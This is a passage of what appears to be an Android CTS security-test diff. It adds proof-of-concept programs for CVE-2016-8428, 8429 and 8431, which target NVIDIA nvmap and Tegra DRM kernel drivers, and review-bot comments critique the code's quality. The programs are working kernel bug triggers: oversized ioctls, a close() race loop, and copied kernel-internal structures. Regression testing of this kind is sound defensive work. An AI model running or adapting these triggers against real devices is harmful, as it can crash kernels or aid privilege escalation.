+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
new file mode 100644
index 0000000..b65b16c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
@@ -0,0 +1,213 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>  
+#include <unistd.h> 
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+	__u32 handle;		/* nvmap handle */
+	__u32 param;		/* size/align/base/heap etc. */
+	unsigned long result;	/* returns requested info*/
+};
+
+struct nvmap_create_handle {
+	union {
+		__u32 id;	/* FromId */
+		__u32 size;	/* CreateHandle */
+		__s32 fd;	/* DmaBufFd or FromFd */
+	};
+	__u32 handle;		/* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+	__u32 handle;		/* nvmap handle */
+	__u32 heap_mask;	/* heaps to allocate from */
+	__u32 flags;		/* wb/wc/uc/iwb etc. */
+	__u32 align;		/* min alignment necessary */
+};
+
+struct nvmap_cache_op_list {
+	__u64 handles;		/* Ptr to u32 type array, holding handles */
+	__u64 offsets;		/* Ptr to u32 type array, holding offsets
+				 * into handle mem */
+	__u64 sizes;		/* Ptr to u32 type array, holindg sizes of memory
+				 * regions within each handle */
+	__u32 nr;		/* Number of handles */
+	__s32 op;		/* wb/wb_inv/inv */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID  _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD  _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE       _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC    _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18,	struct nvmap_cache_op_list)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE          (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)
+enum {
+	NVMAP_PAGES_UNRESERVE = 0,
+	NVMAP_PAGES_RESERVE
+};
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_alloc_handle g_real_alloc = {0};
+struct nvmap_cache_op_list g_op_list = {0};
+#define MAX_HANDLE_NUM (1000)
+int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
+int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};
+
+int open_driver() {
+    char* dev_path = "/dev/nvmap";
+    g_fd = open(dev_path, O_RDWR);
+    if (g_fd < 0) {
+        printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+    } else {
+        printf("[*] open file(%s) succ!\n", dev_path);
+    }
+    return g_fd;
+}
+
+int trigger_nvmap_create() {
+    g_allocation->handle = -1;
+    ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+    printf("[*] NVMAP_IOC_CREATE, last error = %d\n", errno);
+    return g_allocation->handle;
+}
+
+void trigger_nvmap_alloc(int handle) {
+    g_real_alloc.handle = handle;
+    ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+    printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);
+}
+
+void trigger_nvmap_free(int handle) {
+    ioctl(g_fd, NVMAP_IOC_FREE, handle);
+    printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+    setpriority(PRIO_PROCESS, gettid(), privi);
+    printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+    /* bind process to a CPU*/
+    if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+        printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+    }
+}
+
+void prepare_data() {
+    int i;
+    void* data = calloc(1, 0x1000);
+    
+    g_allocation = (struct nvmap_create_handle*)data;
+    g_allocation->size = 0x40;
+    
+    g_real_alloc.align = 0x40;
+    g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+    g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+    
+    g_op_list.handles = (__u64)(&g_handles_for_alloc[0]);
+    g_op_list.offsets = (__u64)calloc(1, MAX_HANDLE_NUM * 4);
+    g_op_list.sizes = (__u64)malloc(MAX_HANDLE_NUM * 4);
+    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+        ((int*)(g_op_list.sizes))[i] = 0xFFFF0000;
+    }
+    g_op_list.nr = MAX_HANDLE_NUM;
+    g_op_list.op = NVMAP_PAGES_RESERVE;
+}
+
+
+void create_handles() {
+    int i;
+    
+    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+        g_handles_for_alloc[i] = trigger_nvmap_create();
+    }
+
+}
+
+
+void trigger_rw_handle(int handle) {
+    ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list);
+    printf("[*] NVMAP_IOC_RESERVE errno = %d\n", errno);
+}
+
+int main(int argc, char**argv) {
+    int i;
+    
+    if (open_driver() < 0) {
+        return -1;
+    }
+    
+    prepare_data();
+    create_handles();
+    
+    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+        trigger_nvmap_alloc(g_handles_for_alloc[i]);
+    }
+    
+    printf("[*] Begin to trigger bug....\n");
+    sleep(1);
+    
+    
+    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+        trigger_rw_handle(g_handles_for_alloc[i]);
+    }
+
+    return 0;
+}
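Review bot: `int g_handles_for_free[MAX_HANDLE_NUM] = {-1};` and the matching `g_handles_for_alloc` initialiser set only element 0 to -1 and zero the other 999 entries, so an unset slot looks like handle 0; fill the arrays in a loop if -1 is meant as the sentinel (`g_handles_for_free` is never used and can be removed). `prepare_data()` casts pointers straight to `__u64` and never checks `calloc()`/`malloc()`; with `LOCAL_MULTILIB := both` the 32-bit build should cast through `uintptr_t`, e.g. `g_op_list.sizes = (__u64)(uintptr_t)sizes;`, after a NULL check. `trigger_rw_handle()` ignores its `handle` parameter, so the final loop issues the same `NVMAP_IOC_RESERVE` request `MAX_HANDLE_NUM` times; either drop the parameter or state in a comment that the repetition is deliberate. `NVMAP_HEAP_CARVEOUT_MASK` refers to `NVMAP_HEAP_IOVMM`, which this file does not define.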
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
new file mode 100644
index 0000000..bfe8718
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
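Review bot: The four `CFLAGS +=` lines and `LDFLAGS += -rdynamic` assign plain make variables, while the per-module variables the Android build reads are `LOCAL_CFLAGS` and `LOCAL_LDFLAGS`. The warning set and `-D_FORTIFY_SOURCE=2` therefore very likely never reach the compiler for `poc.c`. Writing them as `LOCAL_CFLAGS += -Wall -W -g -O2 ...` (and `LOCAL_LDFLAGS += -rdynamic` if it is wanted at all) would apply them. Expect new diagnostics once they are on, since `-Wstrict-prototypes` and `-Wmissing-prototypes` will flag the `()` definitions in the sources. The Android.mk files added for CVE-2016-8431, CVE-2016-8432 and CVE-2016-8434 carry the same lines.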
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
new file mode 100644
index 0000000..293f617
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
@@ -0,0 +1,176 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>  
+#include <unistd.h> 
+#include <sched.h>
+
+#define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE          (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)
+
+struct nvmap_handle_param {
+	__u32 handle;		/* nvmap handle */
+	__u32 param;		/* size/align/base/heap etc. */
+	unsigned long result;	/* returns requested info*/
+};
+
+struct nvmap_create_handle {
+	union {
+		__u32 id;	/* FromId */
+		__u32 size;	/* CreateHandle */
+		__s32 fd;	/* DmaBufFd or FromFd */
+	};
+	__u32 handle;		/* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+	__u32 handle;		/* nvmap handle */
+	__u32 heap_mask;	/* heaps to allocate from */
+	__u32 flags;		/* wb/wc/uc/iwb etc. */
+	__u32 align;		/* min alignment necessary */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID  _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD  _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE       _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC    _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle)
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_create_handle g_allocation_dup;
+
+int open_driver() {
+    char* dev_path = "/dev/nvmap";
+    g_fd = open(dev_path, O_RDWR);
+    if (g_fd < 0) {
+        printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+    } else {
+        printf("[*] open file(%s) succ!\n", dev_path);
+    }
+    return g_fd;
+}
+
+void trigger_nvmap_create() {
+    ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+}
+
+void trigger_nvmap_create_dup(int fd) {
+    g_allocation_dup.fd = fd;
+    ioctl(g_fd, NVMAP_IOC_FROM_FD, &g_allocation_dup);
+}
+
+void trigger_nvmap_alloc() {
+    struct nvmap_alloc_handle alloc = {0};
+    alloc.align = 0x1000;
+    alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+    alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+    alloc.handle = g_allocation->handle;
+    ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+}
+
+void trigger_nvmap_free(int fd) {
+    ioctl(g_fd, NVMAP_IOC_FREE, fd);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+    setpriority(PRIO_PROCESS, gettid(), privi);
+
+    /* bind process to a CPU*/
+    if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+    }
+}
+
+void prepare_data() {
+    void* data = (void *) memalign(0x1000, 4 * 0x1000);
+    //void* data = malloc(0x10000);
+    printf("[*] data = %p\n", data);
+    g_allocation = (struct nvmap_create_handle*)data;
+    g_allocation->size = 1024;
+    g_allocation->handle = -1;
+    mprotect(data, 0x1000, PROT_READ);
+    printf("[*] mprotect, error = %d\n", errno);
+}
+
+void* race_thread(void* arg) {
+    setup_privi_and_affinity(-10, 2);
+    
+    pthread_mutex_lock(&mutex);
+    pthread_cond_wait(&cond, &mutex);
+    pthread_mutex_unlock(&mutex);
+    
+    while (1)
+        close(1024);
+}
+
+int main(int argc, char**argv) {
+    
+    setup_privi_and_affinity(-10, 1);
+    
+    if (open_driver() < 0) {
+        return -1;
+    }
+    prepare_data();
+    
+    pthread_t tid;
+    pthread_create(&tid, NULL, race_thread, NULL);
+    usleep(100 * 1000);
+    
+    pthread_cond_signal(&cond);
+    usleep(20);
+    while (1) {
+        trigger_nvmap_create();
+    }
+    return 0;
+}
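Review bot: `main` ends in `while (1) { trigger_nvmap_create(); }` and `race_thread` in `while (1) close(1024);`, so the binary never exits by itself and the final `return 0;` is unreachable; on a fixed kernel the run only ends when the harness kills it. A `for` loop over a named iteration limit would let the test finish and report. In `prepare_data` the result of `memalign` is dereferenced without a NULL check and `<malloc.h>` is not included. `errno` is printed after `mprotect` whether or not the call failed; guarding the `printf` with `if (mprotect(data, 0x1000, PROT_READ) < 0)` would make that line meaningful. `NVMAP_HEAP_CARVEOUT_MASK` also refers to `NVMAP_HEAP_IOVMM`, which this file does not define.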
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
new file mode 100644
index 0000000..d0ef823
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8431
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME     0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD            13
+#define PRIV_CMD_OID                    15
+#define PRIV_CMD_SW_CTRL                20
+#define PRIV_CMD_WSC_PROBE_REQ          22
+
+enum host1x_class {
+        HOST1X_CLASS_HOST1X = 0x1,
+        HOST1X_CLASS_NVENC = 0x21,
+        HOST1X_CLASS_VI = 0x30,
+        HOST1X_CLASS_ISPA = 0x32,
+        HOST1X_CLASS_ISPB = 0x34,
+        HOST1X_CLASS_GR2D = 0x51,
+        HOST1X_CLASS_GR2D_SB = 0x52,
+        HOST1X_CLASS_VIC = 0x5D,
+        HOST1X_CLASS_GR3D = 0x60,
+        HOST1X_CLASS_NVJPG = 0xC0,
+        HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE		0x00
+#define DRM_COMMAND_BASE                0x40
+#define DRM_COMMAND_END                 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL          0x05
+#define DRM_TEGRA_CLOSE_CHANNEL         0x06
+#define DRM_TEGRA_SUBMIT		0x08
+
+struct drm_tegra_open_channel {
+        __u32 client;
+        __u32 pad;
+        __u64 context;
+};
+
+struct drm_tegra_close_channel {
+        __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+	__u32 handle;
+	__u32 offset;
+	__u32 words;
+	__u32 pad;
+};
+
+struct host1x_waitchk {
+	struct host1x_bo *bo;
+	__u32 offset;
+	__u32 syncpt_id;
+	__u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+	__u32 handle;
+	__u32 offset;
+	__u32 syncpt;
+	__u32 thresh;
+};
+
+struct drm_tegra_submit {
+	__u64 context;
+	__u32 num_syncpts;
+	__u32 num_cmdbufs;
+	__u32 num_relocs;
+	__u32 num_waitchks;
+	__u32 waitchk_mask;
+	__u32 timeout;
+	__u64 syncpts;
+	__u64 cmdbufs;
+	__u64 relocs;
+	__u64 waitchks;
+	__u32 fence;		/* Return value */
+	__u32 reserved0;
+	__u64 fences;
+	__u32 reserved1[2];	/* future expansion */
+};
+
+struct drm_tegra_gem_create {
+	__u64 size;
+	__u32 flags;
+	__u32 handle;
+};
+
+struct drm_gem_close {
+	__u32 handle;
+	__u32 pad;
+};
+
+struct drm_mode_map_dumb {
+	__u32 handle;
+	__u32 pad;
+	__u64 offset;
+};
+
+#define DRM_IOCTL_BASE                  'd'
+#define DRM_IOWR(nr,type)       _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type)		_IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE		DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB    DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+	__u32 id;
+	__u32 incrs;
+};
+
+struct list_head {
+	struct list_head *next, *prev;
+};
+
+struct kobject {
+	const char			*name;
+	struct list_head	entry;
+	struct kobject		*parent;
+	void	*kset;
+	void	*ktype;
+	void	*sd;
+	unsigned long refcount;
+	unsigned int state_initialized:1;
+	unsigned int state_in_sysfs:1;
+	unsigned int state_add_uevent_sent:1;
+	unsigned int state_remove_uevent_sent:1;
+	unsigned int uevent_suppress:1;
+};
+
+struct device {
+	struct device	*parent;
+	void	*p;
+	void*	pad0[8];
+	char	*init_name; 
+	void	*type;
+	void*	pad1[5];
+	void	*bus;
+	void	*driver;
+	void	*platform_data;
+	void	*driver_data;
+};
+
+struct host1x_info {
+	int	nb_channels;		
+	int	nb_pts;
+	int	nb_bases;
+	int	nb_mlocks;
+	int	(*init)(void *);
+	int	sync_offset;
+};
+
+struct host1x_syncpt_ops {
+	void (*restore)(void *syncpt);
+	void (*restore_wait_base)(void *syncpt);
+	void (*load_wait_base)(void *syncpt);
+	__u32 (*load)(void *syncpt);
+	int (*cpu_incr)(void *syncpt);
+	int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+	struct host1x_info *info;
+	void	*regs;
+	void	*syncpt;
+	void	*bases;
+	struct device *dev;
+	void	*clk;
+	void	*clk_actmon;
+	void*	pad[5];
+	void	*intr_wq;
+	int intr_syncpt_irq;
+	int intr_general_irq;
+	__u32 intstatus;
+	void (*host_isr[32])(__u32, void *);
+	void *host_isr_priv[32];
+	struct host1x_syncpt_ops *syncpt_op;
+	void	*intr_op;
+	void	*channel_op;
+	void	*cdma_op;
+	void	*cdma_pb_op;
+	void	*actmon_op;
+	void	*debug_op;
+};
+
+struct host1x_client {
+	struct list_head list;
+	void *parent;
+	struct device *dev;
+	void *ops;
+};
+
+struct tegra_drm_client_ops {
+	void* open_channel;
+	void* close_channel; 
+	void* reset;
+	void* is_add_reg;
+	void* submit;
+};
+
+struct tegra_drm_client {
+	unsigned char pad[232];
+	struct list_head list;
+	struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+	struct tegra_drm_client *client;
+	void *channel;
+	struct list_head list;
+};
+
+struct drm_tegra_reloc {
+	struct {
+		__u32 handle;
+		__u32 offset;
+	} cmdbuf;
+	struct {
+		__u32 handle;
+		__u32 offset;
+	} target;
+	__u32 shift;
+	__u32 pad;
+};
+
+#endif
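Review bot: The header uses `__u32`, `__u64`, `_IOWR` and `_IOW` but includes nothing, so it only compiles when the including file has already pulled in the right headers; adding `#include <linux/types.h>` and `#include <sys/ioctl.h>` after the guard would make it self-contained. The guard name `__LOCAL_POC_H__` is in the reserved identifier space, and `LOCAL_POC_H` would do. The wireless-extension constants at the top and the copies of kernel-internal structures (`kobject`, `device`, `host1x`, `tegra_drm_client`) are not referenced by the `poc.c` in this directory. A short comment naming the kernel header and version each layout was copied from would tell a maintainer what has to stay in sync. The same file is added again, with the same blob id, under CVE-2016-8432; one shared include would avoid the two drifting apart.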
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
new file mode 100644
index 0000000..1cc0f29
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
@@ -0,0 +1,91 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdio.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM		1
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel	open_c;
+volatile struct drm_tegra_submit		submit_c;
+volatile struct drm_tegra_gem_create	gem_create;
+
+struct drm_tegra_cmdbuf		cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt		syncpt;
+struct drm_tegra_reloc		relocs[CMD_NUM];
+
+static int prepare()
+{
+	open_c.client = HOST1X_CLASS_VIC;
+	submit_c.num_syncpts = 1;
+	submit_c.syncpts = (__u64)&syncpt;	
+	submit_c.num_cmdbufs = CMD_NUM;
+	submit_c.cmdbufs = (__u64)cmdbufs;
+	submit_c.num_relocs = CMD_NUM;
+	submit_c.relocs = (__u64)relocs;
